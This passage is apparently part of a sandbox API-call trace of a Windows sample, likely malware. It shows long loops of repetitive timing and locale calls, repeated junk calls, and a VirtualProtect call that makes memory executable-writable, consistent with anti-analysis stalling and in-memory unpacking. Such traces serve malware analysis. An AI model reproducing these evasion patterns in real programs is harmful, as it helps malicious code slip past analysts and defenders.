lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.870] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.870] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.870] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.870] GetACP () returned 0x4e4 [0181.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.871] GetACP () returned 0x4e4 [0181.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.871] GetACP () returned 0x4e4 [0181.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.871] GetACP () returned 0x4e4 [0181.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.871] GetACP () returned 0x4e4 [0181.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.871] GetACP () returned 0x4e4 [0181.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.871] GetACP () returned 0x4e4 [0181.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.872] GetACP () returned 0x4e4 [0181.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.872] GetACP () returned 0x4e4 [0181.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.872] GetACP () returned 0x4e4 [0181.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.872] GetACP () returned 0x4e4 [0181.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.872] GetACP () returned 0x4e4 [0181.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.872] GetACP () returned 0x4e4 [0181.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.873] GetACP () returned 0x4e4 [0181.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.873] GetACP () returned 0x4e4 [0181.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.873] GetACP () returned 0x4e4 [0181.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.873] GetACP () returned 0x4e4 [0181.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.873] GetACP () returned 0x4e4 [0181.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.873] GetACP () returned 0x4e4 [0181.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.874] GetACP () returned 0x4e4 [0181.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.874] GetACP () returned 0x4e4 [0181.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.874] GetACP () returned 0x4e4 [0181.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.874] GetACP () returned 0x4e4 [0181.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.874] GetACP () returned 0x4e4 [0181.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.874] GetACP () returned 0x4e4 [0181.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.875] GetACP () returned 0x4e4 [0181.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.875] GetACP () returned 0x4e4 [0181.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.875] GetACP () returned 0x4e4 [0182.169] VirtualProtect (in: lpAddress=0x555ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0182.169] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.170] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.170] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.170] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.170] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.170] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.170] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.170] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.170] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.170] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.170] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.170] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.170] AddAtomA (lpString=0x0) returned 0x0 [0182.170] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.171] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.171] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.171] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.172] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.172] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.172] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.173] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.173] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.173] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.174] AddAtomA (lpString=0x0) returned 0x0 [0182.174] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.174] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.175] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.175] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.175] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.175] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.175] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.175] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.175] AddAtomA (lpString=0x0) returned 0x0 [0182.175] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.176] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.176] AddAtomA (lpString=0x0) returned 0x0 [0182.176] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.176] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.176] AddAtomA (lpString=0x0) returned 0x0 [0182.176] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.176] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.176] AddAtomA (lpString=0x0) returned 0x0 [0182.176] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.176] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.176] AddAtomA (lpString=0x0) returned 0x0 [0182.176] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.176] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.176] AddAtomA (lpString=0x0) returned 0x0 [0182.176] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.177] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.177] AddAtomA (lpString=0x0) returned 0x0 [0182.177] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.177] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.177] AddAtomA (lpString=0x0) returned 0x0 [0182.177] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.177] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.177] AddAtomA (lpString=0x0) returned 0x0 [0182.177] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.177] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.177] AddAtomA (lpString=0x0) returned 0x0 [0182.177] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.177] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.177] AddAtomA (lpString=0x0) returned 0x0 [0182.177] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.177] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.177] AddAtomA (lpString=0x0) returned 0x0 [0182.177] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.178] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.178] AddAtomA (lpString=0x0) returned 0x0 [0182.178] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.178] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.178] AddAtomA (lpString=0x0) returned 0x0 [0182.178] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.178] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.178] AddAtomA (lpString=0x0) returned 0x0 [0182.178] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.178] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.178] AddAtomA (lpString=0x0) returned 0x0 [0182.178] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.178] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.179] AddAtomA (lpString=0x0) returned 0x0 [0182.179] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.179] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.179] AddAtomA (lpString=0x0) returned 0x0 [0182.179] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.179] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.179] AddAtomA (lpString=0x0) returned 0x0 [0182.179] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.179] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.179] AddAtomA (lpString=0x0) returned 0x0 [0182.179] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.179] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.179] AddAtomA (lpString=0x0) returned 0x0 [0182.179] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.179] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.179] AddAtomA (lpString=0x0) returned 0x0 [0182.179] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.180] AddAtomA (lpString=0x0) returned 0x0 [0182.180] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.180] AddAtomA (lpString=0x0) returned 0x0 [0182.180] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0182.180] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0182.180] AddAtomA 